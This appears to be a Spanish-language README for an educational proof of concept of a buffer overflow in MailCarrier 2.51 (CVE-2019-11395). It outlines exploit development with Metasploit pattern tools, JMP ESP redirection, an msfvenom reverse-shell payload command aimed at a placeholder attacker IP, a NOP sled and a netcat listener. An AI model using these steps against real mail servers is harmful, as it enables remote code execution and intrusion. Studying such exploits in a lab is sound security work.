
Prueba de concepto con fines académicos para comprender la vulnerabilidad de desbordamiento de búfer utilizando como antecedente el CVE-2019-11395
Esta prueba de concepto (PoC) demuestra una vulnerabilidad de desbordamiento de búfer en MailCarrier 2.51, que permite a atacantes remotos ejecutar código arbitrario mediante una cadena larga. La vulnerabilidad puede explotarse utilizando los siguientes procesos:
SMTP RCPT TOPOP3 USERPOP3 LISTPOP3 TOPPOP3 RETREl proyecto tiene como objetivo proporcionar un enfoque académico para comprender cómo funciona el desbordamiento de búfer.
Antes de ejecutar cualquier prueba, nunca utilices tu entorno de producción para experimentos iniciales. En su lugar, crea una configuración de laboratorio similar a tu entorno de producción para evitar cualquier problema o consecuencia no deseada.
msf-pattern_create -l <number_of_bytes>
Esto ayuda a determinar el Offset, que es el número exacto de bytes necesarios para sobrescribir el EIP.
msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
Esto identifica el número exacto de bytes requeridos para controlar el EIP.
JMP ESP
CALL ESP
Usaremos esta dirección para redirigir la ejecución. Ten cuidado con ASLR, SafeSEH u otros mecanismos de protección.
msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
NOP (\x90) en el payload para mejorar la estabilidad.netcat (nc) para crear una shell inversa y conectar con el objetivo.